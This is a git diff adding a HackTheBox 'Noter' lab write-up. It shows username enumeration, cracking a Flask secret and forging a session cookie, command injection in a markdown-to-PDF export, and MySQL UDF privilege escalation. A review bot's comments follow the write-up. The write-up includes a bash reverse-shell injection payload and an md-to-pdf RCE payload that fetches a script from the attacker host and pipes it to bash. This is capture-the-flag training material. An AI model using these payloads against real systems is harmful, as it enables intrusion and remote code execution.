diff --git a/HackTheBox/Noter.md b/HackTheBox/Noter.md
new file mode 100644
index 0000000..858f6c6
--- /dev/null
+++ b/HackTheBox/Noter.md
@@ -0,0 +1,265 @@
+# HackTheBox - Noter
+
+## NMAP
+
+```bash
+PORT STATE SERVICE VERSION
+21/tcp open ftp vsftpd 3.0.3
+22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+5000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)
+| http-methods:
+|_ Supported Methods: OPTIONS HEAD GET
+|_http-title: Noter
+Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+```
+
+## PORT 21 (FTP)
+
+Tried anonymous login on ftp which failed, so moving on to port 5000
+
+
+
+## PORT 5000 (HTTP)
+
+
+
+On this page we can see an option to see notes but this required a authorized user, I tried to use default admin password `admin:admin` which didn't worked. Also tried doing a basic sqli `admin' or 1=1 -- ` which failed too
+
+
+
+We do have an option to register an account so let's do that
+
+
+
+After logging in we can add notes and also there's an option for upgrading to VIP
+
+
+
+But this option wasn't available
+
+
+
+So moving on to adding notes, I tried testing for xss which failed
+
+
+
+
+
+Checking the session cookie, it was a flask session as it can be decoded using `flask-unsign` which tells that it's a flask application
+
+
+
+
+
+Maybe there's SSTI in notes, we can check that too because most of the flask apps are vulnerable to SSTI
+
+
+
+
+
+This didn't worked as well, so I went with fuzzing for files and directories using `dirsearch`
+
+
+
+## Foothold
+
+There wasn't really interesting, looking back at the flask session maybe we can modify it to get a user's session but for that there are two things we need a valid username which should have admin privileges or should get us somewhere and a flask secret with which we can forge flask session
+
+We can fuzz for usernames and to do that we need to do some filtering with the responses
+
+
+
+For the existing username we get an error message "Invalid login"
+
+
+
+And for a user which doesn't exist we get "Invalid credentials" so with the help of error messages we can do user enumeration
+
+
+
+Let's first identifiy POST parameters
+
+
+
+I added `ARZ` which is a valid user and `admin` which doesn't exist and looking at the response of characters we can try to filter for characters below `2030` which might give us a username
+
+```bash
+wfuzz -c -w /opt/SecLists/Usernames/xato-net-10-million-usernames-dup.txt -u 'http://10.10.11.16
+0:5000/login' -d 'username=FUZZ&password=1' --hh 2029,2030,2031,2032,2033,2034,2035,2036
+```
+
+
+So it started to show me responses with less characters but still I wasn't sure of which ones could be a username so this method isn't effective even tho we can see a username `blue` with the same exact characters so this might be the username we are looking but we can do this effectively with a tool called `patator`
+
+https://github.com/lanjelot/patator
+
+```bash
+python3 patator.py http_fuzz 'url=http://10.10.11.160:5000/login' method=POST body='username=FILE0&password=a' 0=/opt/SecLists/Usernames/xato-net-10-million-usernames-dup.txt -x ignore:fgrep='Invalid credentials'
+```
+The syntax is a little harder but it's an awesome tool to fuzz with error messages
+
+
+
+Which gives the same user `blue` and if check on the login page to see if this user exists
+
+
+
+We get the message "Invalid login", now we just need the secret in order to modify the flask session
+
+
+
+https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/flask
+
+Visitng hacktricks, we can brute force secret with flask-unsign
+
+
+
+Using `rockyou.txt` to brute force secret didn't work so I had to install the wordlist for flask secret
+
+
+
+```bash
+flask-unsign --unsign --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiQVJaIn0.Ynkvhw.C69zkNUyfYjmYN0e08l6EmWAh1U'
+```
+
+
+And we got the secret which is `secret123`, now we need to sign in having the username `blue`
+
+```bash
+flask-unsign --sign --cookie "{'logged_in': True, 'username': 'blue'}" --secret 'secret123'
+```
+
+
+
+After replacing the flask session we'll be able to login as blue
+
+
+
+And in notes we'll be able to a password for ftp user `blue : blue@Noter!`
+
+
+
+
+
+Reading the pdf file, we'll get another password `username@site_name!` so this must be for the `ftp_admin` which would be `ftp_admin@Noter!`
+
+
+
+Downloading these backup archives, we get two versions of the source code, the one from the backup `1638395546` is having the source code for exporting notes
+
+## Un-Intended Method
+
+
+
+And it's running a command to run a node js module passing the contents of makrdown file to convert it to pdf which is then executing a shell command with `subprocess.run` which is vulnerable to command injection
+
+I created a markdown file having a bash reverse shell, now let's try importing it
+
+
+
+
+
+After exporting the makrdown file we'll get this error but at our netcat listener we'll get a connection but it will just close after connecting
+
+
+
+To escapae the single quote from `$'{r.text.strip()}'` we need to use `'` before our reverse shell and use either pipe `|` or semicolon `;` to execute the reverse shell command at the end we'll specify `#`
+
+```bash
+' ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.51/2222 0>&1' #
+
+```
+
+
+
+Stabilizing the shell with python3
+
+
+
+I didn't find any thing in user's directory or having seeing anything with `sudo -l` so transferred `pspy` to monitor background processes
+
+
+
+We can also see how that single quote escape worked
+
+
+
+## Intended Method
+From the node command being executed, it's a module called `md-to-pdf`
+
+
+
+
+
+This was vulnerable to rce
+
+
+
+https://github.com/simonhaenisch/md-to-pdf/issues/99
+
+```
+---js\n((require("child_process")).execSync("curl 10.10.16.51:3333/shell.sh | bash"))\n---RCE
+
+```
+
+This payload will download our bash reverse shell and execute by piping it to bash
+
+
+
+From the backup of `1635803546` archive, we previously found credentials for mysql so let's test if these work
+
+
+
+
+## Privilege Escalation
+
+Here we can do something which is called `Privilege Escalation with MySQL User Defined Functions`
+
+https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf
+
+https://www.exploit-db.com/exploits/1518
+
+First we need to compile the source code
+
+
+
+Now to create a shared library
+
+
+
+After this we need to locate where the plugins are stroed and create a table in `mysql` database which will have an entry for the exploit which will help us in loading it in mysql plugins, create a user defined function which will run system commands using that shared library
+
+
+
+Plugins directory is `/usr/lib/x86_64-linux-gnu/mariadb19/plugin/`
+
+Switching to mysql database
+
+
+
+Creating a table named `foo` and inserting the shared library
+
+
+
+
+
+From the table, loading the plugin
+
+
+
+Creating the function `do_system`
+
+
+
+And now just using the function to get a reverse shell
+
+
+
+## References
+- https://github.com/lanjelot/patator
+- https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/flask
+- https://pypi.org/project/flask-unsign-wordlist/
+- https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf
+- https://www.exploit-db.com/exploits/50236
+
+
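Review bot: The wfuzz command under Foothold is split across two lines in the middle of the target address (`...http://10.10.11.16` followed by `0:5000/login'`), so it will not run as pasted and reads as a different host from the `10.10.11.160` used in the patator command; join it onto one line. The Privilege Escalation body links `https://www.exploit-db.com/exploits/1518`, but the References list gives `exploits/50236`, so keep whichever one was actually used and make the two agree. The Privilege Escalation steps ("First we need to compile the source code", "Now to create a shared library", "Creating the function `do_system`" and the rest) are each followed only by blank lines, with no command and no image link, so the section cannot be followed from the text alone; add the commands as fenced blocks as was done for the wfuzz and patator steps, or restore the image references. The same applies to the blank runs under PORT 5000 and Foothold. Minor: `makrdown`, `escapae`, `stroed`, `Visitng` and `identifiy` are typos, and "most of the flask apps are vulnerable to SSTI" is stated more strongly than the failed test that follows it supports.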